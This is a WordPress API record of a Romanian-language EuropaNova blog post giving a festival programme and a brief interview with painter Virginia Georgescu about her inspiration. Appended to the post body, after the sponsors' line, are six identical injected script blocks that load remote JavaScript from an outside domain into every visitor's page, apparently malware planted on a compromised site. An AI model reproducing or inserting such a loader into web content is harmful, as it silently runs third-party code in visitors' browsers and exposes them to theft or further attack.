{"id":6984,"date":"2023-09-19T09:58:25","date_gmt":"2023-09-19T08:58:25","guid":{"rendered":"https:\/\/www.europanova.be\/virginia-georgescu-ma-inspira-natura-perfectiunea-si-frumusetea-ei\/"},"modified":"2025-12-17T14:46:46","modified_gmt":"2025-12-17T13:46:46","slug":"virginia-georgescu-ma-inspira-natura-perfectiunea-si-frumusetea-ei","status":"publish","type":"post","link":"https:\/\/www.europanova.be\/ro\/virginia-georgescu-ma-inspira-natura-perfectiunea-si-frumusetea-ei\/","title":{"rendered":"Virginia Georgescu: \u201cM\u0103 inspir\u0103 natura, perfec\u021biunea \u0219i frumuse\u021bea ei\u201d"},"content":{"rendered":"\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-small-font-size\"><strong>Vineri, 22 septembrie \u2013 Deschiderea Festivalului<\/strong>: <strong>de la 18:00<\/strong><\/p>\n\n\n\n<p class=\"has-small-font-size\">EuropaNova,&nbsp;Clos du Parnasse 11E, Bruxelles <\/p>\n\n\n\n<p class=\"has-small-font-size\">Discurs inaugural: MIRELA NI\u021a\u0102 SANDU<\/p>\n\n\n\n<p class=\"has-small-font-size\">Vernisajul expozi\u021biei de pictur\u0103 \u038c\u03bb\u03b1 \u03ba\u03b1\u03bb\u03ac<\/p>\n\n\n\n<p class=\"has-small-font-size\">Artist: VIRGINIA GEORGESCU<\/p>\n\n\n\n<p class=\"has-small-font-size\">Mini-concert: ANZHELA HOVHANNISYAN (vioar\u0103), IOANA CRISTINA MIHAI (pian)<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>EUROPANOVA: Din nou la EuropaNova. Trebuie c\u0103-\u021bi place la noi\u2026<\/p>\n\n\n\n<p>VIRGINIA GEORGESCU: Ne leag\u0103 amintiri vechi \u0219i frumoase\u2026<\/p>\n\n\n\n<p>EUROPANOVA: Cu ce vei \u00eent\u00e2mpina publicul la Festivalul EuropaNova?<\/p>\n\n\n\n<p>VIRGINIA GEORGESCU: Cu 7 imagini ale frumuse\u021bii... care va m\u00e2ntui lumea, ca s\u0103-l parafrazez pe Dostoievski!<\/p>\n\n\n\n<p>EUROPANOVA: Dezv\u0103luie-ne c\u00e2te ceva din procesul creativ. Ce te inspir\u0103 zilele astea? C\u00e2nd \u0219i unde preferi s\u0103 pictezi?<\/p>\n\n\n\n<p>VIRGINIA GEORGESCU: M\u0103 inspir\u0103 natura, perfec\u021biunea \u0219i frumuse\u021bea ei.<\/p>\n\n\n\n<p>EUROPANOVA: Se mai \u00eent\u00e2mpl\u0103 s\u0103 nu-\u021bi ias\u0103 ceea ce vezi cu ochii min\u021bii? S\u0103 porne\u0219ti cu o idee \u0219i s\u0103 te treze\u0219ti c\u0103 ai pictat altceva?<\/p>\n\n\n\n<p>VIRGINIA GEORGESCU: O, da, sigur, uneori pornesc cu o idee&nbsp; vag\u0103 a ceea ce va fi \u0219i, lucr\u00e2nd, descop\u0103r\u2026 ce nici nu am b\u0103nuit. Este o rela\u021bie \u00eentre a privi, a observa \u0219i a face, a plonja \u00een subiect, este o rela\u021bie cu explorarea posibilit\u0103\u021bilor materialului folosit, gest, m\u00e2ng\u00e2iere \u0219i sensibilitate \u00een fa\u021ba subiectului.<\/p>\n\n\n\n<p>EUROPANOVA: Ai \u00eenchis \u2013 pe dinafar\u0103 \u2013 u\u0219a atelierului t\u0103u. Te g\u00e2nde\u0219ti apoi ce se \u00eent\u00e2mpl\u0103 acolo, \u00een\u0103untru, \u00een absen\u021ba ta?<\/p>\n\n\n\n<p>VIRGINIA GEORGESCU: De c\u00e2te ori plec din fa\u021ba lucr\u0103rii, iau totul cu mine, totul se \u00eent\u00e2mpl\u0103 \u00een mine... \u0219i c\u00e2nd rev\u0103d lucrarea, o rev\u0103d cu al\u021bi ochi. Mi se pare \u00eentotdeauna c\u0103 lucrarea nu este a\u0219a cum \u00eemi aminteam eu c\u0103 era\u2026 \u0218i tot a\u0219a p\u00e2n\u0103 ajung cu ea \u00eentr-un punct de echilibru \u00een care poate s\u0103 stea!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-small-font-size\">Acest proiect este realizat cu sprijinul Departamentului pentru Rom\u00e2nii de Pretutindeni, al Institutului Cultural Rom\u00e2n \u2013 Bruxelles, al Ambasadei Rom\u00e2niei \u00een Regatul Belgiei \u0219i al Ambasadei Moldovei \u00een Regatul Belgiei \u0219i Luxemburg.<\/p>\n<script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script>","protected":false},"excerpt":{"rendered":"<p>Vineri, 22 septembrie \u2013 Deschiderea Festivalului: de la 18:00 EuropaNova,&nbsp;Clos du Parnasse 11E, Bruxelles Discurs inaugural: MIRELA NI\u021a\u0102 SANDU Vernisajul expozi\u021biei de pictur\u0103 \u038c\u03bb\u03b1 \u03ba\u03b1\u03bb\u03ac Artist: VIRGINIA GEORGESCU Mini-concert: ANZHELA HOVHANNISYAN (vioar\u0103), IOANA CRISTINA MIHAI (pian) EUROPANOVA: Din nou la EuropaNova. Trebuie c\u0103-\u021bi place la noi\u2026 VIRGINIA GEORGESCU: Ne leag\u0103 amintiri vechi \u0219i frumoase\u2026 EUROPANOVA: [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6976,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[143],"tags":[],"class_list":["post-6984","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-artistes-peintres"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/posts\/6984","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/comments?post=6984"}],"version-history":[{"count":7,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/posts\/6984\/revisions"}],"predecessor-version":[{"id":7154,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/posts\/6984\/revisions\/7154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/media\/6976"}],"wp:attachment":[{"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/media?parent=6984"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/categories?post=6984"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.europanova.be\/ro\/wp-json\/wp\/v2\/tags?post=6984"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}